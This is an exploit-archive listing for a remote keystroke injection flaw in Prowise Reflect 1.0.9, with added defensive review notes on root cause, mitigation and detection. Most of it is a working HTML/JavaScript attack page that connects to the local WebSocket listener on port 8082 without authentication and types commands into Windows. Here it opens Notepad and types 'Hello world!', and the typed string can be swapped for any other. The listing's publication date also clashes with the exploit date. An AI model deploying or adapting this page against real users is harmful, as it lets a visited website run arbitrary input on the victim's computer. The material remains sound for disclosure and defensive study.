Prowise Reflect 1.0.9 Remote Keystroke Injection

2022.03.02
Credit: Rik Lutz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection
# Date: 30/10/2022
# Exploit Author: Rik Lutz
# Vendor Homepage: https://www.prowise.com/
# Version: V1.0.9
# Tested on: Windows 10
# Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection.
# Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed),
# or by visiting a malicious website. This POC contains the malicious webpage.
# Steps:
# 1. Start Prowise reflect
# 2. Try to connect to a reflect server e.q. ygm7u6od
# 3. When it is connecting click exploit
# - Start menu will open, types notepad.exe and types hello world.
<!--
  Review notes (defensive reading of this proof of concept):
  * Root cause as shown in this listing: the page opens ws://localhost:8082 from an
    ordinary browser context and sends "keyboard" events as soon as the socket opens.
    Nothing here sends a credential, token or pairing step first, so the listener
    appears to accept input events from any client that can reach it. Presumably it
    also does not check the Origin header of the handshake; confirm against the product.
  * Browsers do not apply the same-origin policy to WebSocket connections, so a local
    service has to enforce an Origin allow-list and/or per-session authentication itself.
  * Mitigation: require authentication before honouring input events, validate Origin
    during the handshake, bind the listener to loopback unless remote control is
    intended, and block inbound TCP 8082 at the host firewall. The page names no fixed
    version.
  * Detection: connections to TCP 8082 from browser processes or from other hosts, and
    "keyboard" events arriving without a preceding session setup.
-->
<!DOCTYPE HTML>
<html>
  <head>
    <script type = "text/javascript">
      /**
       * Busy-wait helper: spins on the wall clock until `ms` milliseconds have elapsed.
       * The loop never yields, so the calling script is blocked for the whole interval.
       * @param {number} ms - delay in milliseconds.
       */
      function wait(ms){
        var start = new Date().getTime();
        var end = start;
        while(end < start + ms) {
          end = new Date().getTime();
        }
      }

      /**
       * Click handler for the link in the page body. Connects to the WebSocket
       * listener on localhost port 8082 and, once the socket is open, sends a fixed
       * sequence of JSON "keyboard" events separated by blocking delays.
       * Shows an alert when the socket closes or when WebSocket is unavailable.
       */
      function WebSocketTest() {
        // Never read anywhere in this listing.
        var StateConnecting = new Boolean(false);
        if ("WebSocket" in window) {
          // Let us open a web socket
          // The target is the loopback address of whoever loads this page, which is
          // why the header describes delivery through a visited website.
          var ws = new WebSocket("ws://localhost:8082");
          ws.onopen = function() {
            // The first frame sent is already an input event; no authentication or
            // session setup precedes it.
            ws.send('{"event":"keyboard", "key":"super"}');
            wait(400);
            //character is slower
            // NOTE(review): presumably refers to the "character" event form in the
            // commented-out line below; confirm with the author.
            // ws.send('{"event":"keyboard", "character":"notepad.exe"}'};
            // You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true
            // Fixed demonstration string, sent one "key" event per character.
            // The JSON is built by string concatenation with no escaping.
            var exploitcode = "notepad.exe"
            for (let i = 0; i < exploitcode.length; i++) {
              ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
            }
            wait(300);
            ws.send('{"event":"keyboard", "key":"enter"}');
            wait(2000);
            // Second fixed demonstration string, sent the same way.
            exploitcode = "Hello world!"
            for (let i = 0; i < exploitcode.length; i++) {
              ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
            }
            wait(200);
          };
          ws.onmessage = function (evt) {
            // The reply is stored in a local and not used further.
            var received_msg = evt.data;
          };
          ws.onclose = function() {
            // websocket is closed.
            alert("Connection is closed...");
          };
        } else {
          // The browser doesn't support WebSocket
          alert("WebSocket NOT supported by your Browser!");
        }
      }
    </script>
  </head>
  <body>
    <div id = "sse">
      <a href = "javascript:WebSocketTest()">Exploit!</a>
    </div>
  </body>
</html>

